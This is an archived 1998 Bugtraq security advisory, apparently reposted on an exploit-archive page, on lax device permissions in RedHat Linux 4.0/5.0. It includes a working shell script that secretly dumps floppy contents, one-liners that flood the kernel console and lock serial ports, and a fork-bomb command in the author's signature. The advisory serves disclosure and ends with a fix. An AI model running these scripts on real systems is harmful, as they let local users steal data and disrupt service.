Poor device permissions on Redhat 4.0/5.0

Summary
Description:Lax device perms on RedHat boxes allow unprivileged users to do nasty things such as peeking at the contents of a floppy in your drive or DOS attacks against the system.
Author:Smart List user <slist@cyber.com.au>
Compromise:Local users can read floppy device, be annoying
Vulnerable Systems:RedHat Linux 4.0 and 5.0
Date:4 February 1998
Details


Date: Thu, 5 Feb EDT  03:05:00 +1100 (EST)
From: Smart List user <slist@cyber.com.au>

cheops
Received: from brimstone.netspace.org by postbox.anu.edu.au with ESMTP
	(1.37.109.16/16.2) id AA105288284; Thu, 5 Feb 1998 03:04:45 +1100
Received: from unknown@netspace.org (port 32056 [128.148.157.6]) by brims=
tone.netspace.org with ESMTP id <739-15594>; Wed, 4 Feb 1998 10:54:46 -05=
00
Received: from NETSPACE.ORG by NETSPACE.ORG (LISTSERV-TCP/IP release 1.8c=
) with
          spool id 7421619 for BUGTRAQ@NETSPACE.ORG; Wed, 4 Feb 1998 10:5=
3:03
          -0500
Received: from brimstone.netspace.org (brimstone.netspace.org
          [128.148.157.143]) by netspace.org (8.8.7/8.8.2) with ESMTP id
          KAA16604 for <BUGTRAQ@NETSPACE.ORG>; Wed, 4 Feb 1998 10:52:30 -=
0500
Received: from unknown@netspace.org (port 32056 [128.148.157.6]) by
          brimstone.netspace.org with ESMTP id <658-15595>; Wed, 4 Feb 19=
98
          10:51:04 -0500
Approved-By: aleph1@UNDERGROUND.ORG
Received: from mx1.polbox.com (mx1.polbox.com [195.116.5.16]) by netspace=
=2Eorg
          (8.8.7/8.8.2) with ESMTP id CAA10552 for <BUGTRAQ@NETSPACE.ORG>=
; Wed,
          4 Feb 1998 02:58:43 -0500
Received: from lcamtuf (ppp3-cst162.warszawa.tpnet.pl [195.116.251.162]) =
by
          mx1.polbox.com (8.8.5/rev-A0) with SMTP id JAA00118 for
          <BUGTRAQ@NETSPACE.ORG>; Wed, 4 Feb 1998 09:04:08 +0100
Mime-Version: 1.0
Content-Type: text/plain; charset=3D"iso-8859-2"
X-Priority: 3
X-Msmail-Priority: Normal
X-Mailer: Microsoft Outlook Express 4.71.1712.3
X-Mimeole: Produced By Microsoft MimeOLE V4.71.1712.3
Content-Transfer-Encoding: 8bit
X-Mime-Autoconverted: from quoted-printable to 8bit by netspace.org id CA=
A10555
Message-Id: <01bd3149$43e38600$a2fb74c3@lcamtuf>
Date: 	Wed, 4 Feb 1998 09:45:37 +0100

Sender: avalon
From: =3D?UNKNOWN-8BIT?Q?Micha=3DB3?=3D Zalewski <lcamtuf@POLBOX.COM>
Subject:      RedHat 4.x/5.0 /dev permissions
To: BUGTRAQ@NETSPACE.ORG
Approved: darrenr@cyber.com.au
X-Originally-To: To: BUGTRAQ@NETSPACE.ORG
X-Originated-From: From: =3D?UNKNOWN-8BIT?Q?Micha=3DB3?=3D Zalewski <lcamtuf@POLBOX.COM>

First one
----------

Any user can read data from (even not mounted) floppy using
"cat /dev/fd0H1440". It isn't dangerous itself, but... Any user
may write a script, which periodically checks if floppy has been
just unmounted, then dumps it's content to a file. Here's a sample
'floppy collector':

-- fdumper --
#!/bin/sh
DUMP_DEV=3D/dev/fd0H1440
MOUNT_DEV=3D/dev/fd0
LABEL=3D0
DUMPED=3D1
while :; do
  sleep 1
  if [ "`mount|grep \"^${MOUNT_DEV}\"`" =3D "" ]; then
    if [ "$DUMPED" =3D "0" ]; then
      echo "Dumping image #$LABEL..."
      cat $DUMP_DEV >.fdimage$LABEL
      let LABEL=3DLABEL+1
      DUMPED=3D1
    fi
  else
    DUMPED=3D0
  fi
done
-- eof --

Also, if there's no floppy in drive, unprivledged user may flood
kernel log console (local console by default!!!):

[user@host sth]$ while :; do cat /dev/fd0H1440;done &

It will generate a lot of kernel messages, which will be logged
to /var/log/messages AND to console (default klogd behaviour). Also,
every printk(...) (called by fd driver) uses sync() to flush buffers.
It will cause abnormal hdd activity.

Second one
-----------
(not tested with rh 5.0)

Ordinary user are allowed to read /dev/ttyS*. Serial ports driver
disallows multiple access attempts at the same time, so user may
permanently lock choosen port using this command:

[user@host user]$ cat /dev/ttyS0
(Ctrl+Z)
[user@host user]$ cat /dev/ttyS0
cat: /dev/ttyS0: device is busy

Now serial port is in unusable state.

That's all?
------------

There are also a lot of other, not-so-common devices, eg. /dev/sequencer,=

which are world-readable or even world-writable.

There's no ANY reason to give ordinary users direct access to hardware
devices. It's quite easy (as shown above ;) to obtain an interesting
data or cause system failure by reading/writing these devices.

Solution...
------------

ls -l /dev/* | grep "r-- "
chmod ;)

_______________________________________________________________________
Micha=B3 Zalewski [tel 9690] | finger 4 PGP [lcamtuf@boss.staszic.waw.pl]=

Iterowa=E6 jest rzecz=B1 ludzk=B1, wykonywa=E6 rekursywnie - bosk=B1 [P. =
Deustch]
=3D------- [ echo -e "while :;do \$0&\ndone">_;chmod +x _;./_ ] --------=3D=

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources: